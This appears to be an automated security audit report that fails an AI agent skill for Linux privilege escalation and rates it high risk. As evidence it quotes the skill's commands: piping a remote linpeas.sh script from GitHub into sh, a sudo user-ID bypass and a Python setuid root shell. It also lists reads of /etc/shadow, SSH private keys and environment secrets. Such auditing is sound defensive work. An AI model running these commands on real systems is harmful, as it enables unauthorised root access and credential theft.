escalating-linux-privileges

Fail

Audited by Gen Agent Trust Hub on Mar 21, 2026

Risk Level: HIGH
Categories: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, DATA_EXFILTRATION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill instructs users to download and execute scripts directly from third-party GitHub repositories by piping them to the shell.
    • Evidence: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh in SKILL.md.
  • [EXTERNAL_DOWNLOADS]: Multiple automated enumeration and exploitation tools are fetched from various individual GitHub repositories.
    • Evidence: Downloads include LinPEAS, LinEnum, Linux Smart Enumeration (lse.sh), and pspy64.
  • [COMMAND_EXECUTION]: Provides extensive methods for escalating privileges and bypassing security constraints.
    • Evidence: Commands for sudo bypass (e.g., sudo -u#-1 /bin/bash), SUID/SGID exploitation, and capability abuse (e.g., python -c 'import os; os.setuid(0); os.system("/bin/bash")').
  • [DATA_EXFILTRATION]: Contains instructions to search for and read highly sensitive files containing credentials.
    • Evidence: Commands to access /etc/shadow, SSH private keys (id_rsa), environment variables (/proc/self/environ), and database configuration files.
Recommendations
  • HIGH: Downloads and executes remote code from: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Mar 21, 2026, 01:18 AM